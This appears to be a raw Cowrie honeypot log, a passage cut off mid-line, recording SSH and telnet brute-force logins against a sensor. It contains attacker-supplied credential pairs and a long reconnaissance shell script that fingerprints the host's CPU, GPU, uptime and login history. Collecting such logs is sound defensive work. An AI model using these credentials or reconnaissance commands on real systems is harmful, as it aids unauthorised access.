"hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T08:55:00.474485Z","src_ip":"212.227.235.229","session":"1728c434f78e"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:55:00.947158Z","src_ip":"212.227.235.229","session":"1728c434f78e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T08:55:01.106884Z","session":"1728c434f78e"}
{"eventid":"cowrie.session.closed","duration":30.839762210845947,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:55:25.382770Z","src_ip":"212.227.125.160","session":"89569528efa0"}
{"eventid":"cowrie.session.closed","duration":33.16970658302307,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:55:30.430506Z","src_ip":"212.227.235.229","session":"87b49d6289ed"}
{"eventid":"cowrie.session.connect","src_ip":"8.219.87.32","src_port":60326,"dst_ip":"1.2.3.4","dst_port":23,"session":"ec8fe222ce5f","protocol":"telnet","message":"New connection: 8.219.87.32:60326 (1.2.3.4:23) [session: ec8fe222ce5f]","sensor":"my-vps","timestamp":"2025-08-26T08:55:50.482005Z"}
{"eventid":"cowrie.session.connect","src_ip":"47.245.118.83","src_port":37496,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4efeeb15940","protocol":"telnet","message":"New connection: 47.245.118.83:37496 (1.2.3.4:23) [session: d4efeeb15940]","sensor":"my-vps","timestamp":"2025-08-26T08:56:00.530000Z"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:56:10.317377Z","src_ip":"212.227.235.229","session":"1728c434f78e"}
{"eventid":"cowrie.session.closed","duration":30.63070845603943,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:56:21.112645Z","src_ip":"8.219.87.32","session":"ec8fe222ce5f"}
{"eventid":"cowrie.session.closed","duration":30.637956142425537,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:56:31.167876Z","src_ip":"47.245.118.83","session":"d4efeeb15940"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:56:43.479895Z","src_ip":"79.124.8.120","session":"b903df8c7508"}
{"eventid":"cowrie.session.closed","duration":180.08250784873962,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:56:43.485050Z","src_ip":"79.124.8.120","session":"b903df8c7508"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60882,"dst_ip":"1.2.3.4","dst_port":22,"session":"c67cad8bd1e2","protocol":"ssh","message":"New connection: 196.251.86.249:60882 (1.2.3.4:22) [session: c67cad8bd1e2]","sensor":"my-vps","timestamp":"2025-08-26T08:57:20.400769Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:57:20.419497Z","src_ip":"196.251.86.249","session":"c67cad8bd1e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48858,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b6180bf247b","protocol":"ssh","message":"New connection: 212.227.235.229:48858 (1.2.3.4:22) [session: 1b6180bf247b]","sensor":"my-vps","timestamp":"2025-08-26T08:57:24.527222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:57:25.462762Z","src_ip":"212.227.235.229","session":"1b6180bf247b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:57:25.464241Z","src_ip":"212.227.235.229","session":"1b6180bf247b"}
{"eventid":"cowrie.login.success","username":"root","password":"Lohit@123","message":"login attempt [root/Lohit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:57:29.394949Z","src_ip":"212.227.235.229","session":"1b6180bf247b"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:57:29.957343Z","src_ip":"212.227.235.229","session":"1b6180bf247b"}
{"eventid":"cowrie.session.closed","duration":"276.8","message":"Connection lost after 276.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:58:00.172671Z","src_ip":"212.227.235.229","session":"9f6b5918564e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":45138,"dst_ip":"1.2.3.4","dst_port":22,"session":"09e813b450cd","protocol":"ssh","message":"New connection: 196.251.86.249:45138 (1.2.3.4:22) [session: 09e813b450cd]","sensor":"my-vps","timestamp":"2025-08-26T08:58:44.080219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:58:44.759567Z","src_ip":"196.251.86.249","session":"09e813b450cd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T08:58:44.760328Z","src_ip":"196.251.86.249","session":"09e813b450cd"}
{"eventid":"cowrie.login.failed","username":"test1","password":"test1","message":"login attempt [test1/test1] failed","sensor":"my-vps","timestamp":"2025-08-26T08:58:46.716553Z","src_ip":"196.251.86.249","session":"09e813b450cd"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:58:48.272354Z","src_ip":"196.251.86.249","session":"09e813b450cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43960,"dst_ip":"1.2.3.4","dst_port":23,"session":"8d2a15d72920","protocol":"telnet","message":"New connection: 212.227.125.160:43960 (1.2.3.4:23) [session: 8d2a15d72920]","sensor":"my-vps","timestamp":"2025-08-26T08:59:41.369139Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T08:59:41.846485Z","src_ip":"212.227.125.160","session":"8d2a15d72920"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-26T08:59:43.364813Z","src_ip":"212.227.125.160","session":"8d2a15d72920"}
{"eventid":"cowrie.session.closed","duration":4.35702919960022,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:59:45.726078Z","src_ip":"212.227.125.160","session":"8d2a15d72920"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43974,"dst_ip":"1.2.3.4","dst_port":23,"session":"1a952982f55e","protocol":"telnet","message":"New connection: 212.227.125.160:43974 (1.2.3.4:23) [session: 1a952982f55e]","sensor":"my-vps","timestamp":"2025-08-26T08:59:45.882952Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:59:46.610075Z","src_ip":"212.227.125.160","session":"1a952982f55e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:59:46.667492Z","src_ip":"212.227.125.160","session":"1a952982f55e"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T08:59:46.925975Z","src_ip":"212.227.125.160","session":"1a952982f55e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:59:48.107059Z","src_ip":"212.227.125.160","session":"1a952982f55e"}
{"eventid":"cowrie.session.closed","duration":2.22957706451416,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:59:48.112397Z","src_ip":"212.227.125.160","session":"1a952982f55e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58830,"dst_ip":"1.2.3.4","dst_port":22,"session":"5be0fecd32d4","protocol":"ssh","message":"New connection: 212.227.235.229:58830 (1.2.3.4:22) [session: 5be0fecd32d4]","sensor":"my-vps","timestamp":"2025-08-26T08:59:58.898076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T08:59:59.639227Z","src_ip":"212.227.235.229","session":"5be0fecd32d4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T08:59:59.640134Z","src_ip":"212.227.235.229","session":"5be0fecd32d4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":55564,"dst_ip":"1.2.3.4","dst_port":22,"session":"50624af8bd6d","protocol":"ssh","message":"New connection: 196.251.86.249:55564 (1.2.3.4:22) [session: 50624af8bd6d]","sensor":"my-vps","timestamp":"2025-08-26T08:59:59.852911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:00:00.185205Z","src_ip":"196.251.86.249","session":"50624af8bd6d"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:00:00.186050Z","src_ip":"196.251.86.249","session":"50624af8bd6d"}
{"eventid":"cowrie.login.failed","username":"test2","password":"test2","message":"login attempt [test2/test2] failed","sensor":"my-vps","timestamp":"2025-08-26T09:00:01.165081Z","src_ip":"196.251.86.249","session":"50624af8bd6d"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:00:02.744365Z","src_ip":"196.251.86.249","session":"50624af8bd6d"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd@123","message":"login attempt [root/Passw0rd@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:00:03.624404Z","src_ip":"212.227.235.229","session":"5be0fecd32d4"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:00:05.299732Z","src_ip":"212.227.235.229","session":"5be0fecd32d4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60750,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b283d8dcc0d","protocol":"ssh","message":"New connection: 217.72.205.35:60750 (1.2.3.4:22) [session: 0b283d8dcc0d]","sensor":"my-vps","timestamp":"2025-08-26T09:00:31.821733Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:00:31.823088Z","src_ip":"217.72.205.35","session":"0b283d8dcc0d"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":41604,"dst_ip":"1.2.3.4","dst_port":23,"session":"be38e8e27a86","protocol":"telnet","message":"New connection: 79.124.8.120:41604 (1.2.3.4:23) [session: be38e8e27a86]","sensor":"my-vps","timestamp":"2025-08-26T09:00:45.742481Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:00:45.783078Z","src_ip":"79.124.8.120","session":"be38e8e27a86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:00:45.852177Z","src_ip":"79.124.8.120","session":"be38e8e27a86"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":35482,"dst_ip":"1.2.3.4","dst_port":22,"session":"de715d14cec7","protocol":"ssh","message":"New connection: 196.251.86.249:35482 (1.2.3.4:22) [session: de715d14cec7]","sensor":"my-vps","timestamp":"2025-08-26T09:01:12.697265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:01:13.196051Z","src_ip":"196.251.86.249","session":"de715d14cec7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:01:13.197562Z","src_ip":"196.251.86.249","session":"de715d14cec7"}
{"eventid":"cowrie.login.failed","username":"test3","password":"test3","message":"login attempt [test3/test3] failed","sensor":"my-vps","timestamp":"2025-08-26T09:01:14.197538Z","src_ip":"196.251.86.249","session":"de715d14cec7"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:01:15.382028Z","src_ip":"196.251.86.249","session":"de715d14cec7"}
{"eventid":"cowrie.session.connect","src_ip":"123.31.39.100","src_port":58421,"dst_ip":"1.2.3.4","dst_port":23,"session":"f3c7702863ad","protocol":"telnet","message":"New connection: 123.31.39.100:58421 (1.2.3.4:23) [session: f3c7702863ad]","sensor":"my-vps","timestamp":"2025-08-26T09:01:19.492239Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60669,"dst_ip":"1.2.3.4","dst_port":23,"session":"de9b686195a5","protocol":"telnet","message":"New connection: 212.227.125.160:60669 (1.2.3.4:23) [session: de9b686195a5]","sensor":"my-vps","timestamp":"2025-08-26T09:01:22.628999Z"}
{"eventid":"cowrie.session.closed","duration":46.18462610244751,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:02:05.676773Z","src_ip":"123.31.39.100","session":"f3c7702863ad"}
{"eventid":"cowrie.session.closed","duration":46.11958885192871,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:02:08.748520Z","src_ip":"212.227.125.160","session":"de9b686195a5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39914,"dst_ip":"1.2.3.4","dst_port":22,"session":"79b21a0188ed","protocol":"ssh","message":"New connection: 196.251.86.249:39914 (1.2.3.4:22) [session: 79b21a0188ed]","sensor":"my-vps","timestamp":"2025-08-26T09:02:23.711016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:02:24.063284Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:02:24.064550Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.login.success","username":"root","password":"root123","message":"login attempt [root/root123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:02:25.274897Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:02:26.033864Z","src_ip":"196.251.86.249","session":"79b21a0188ed"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d 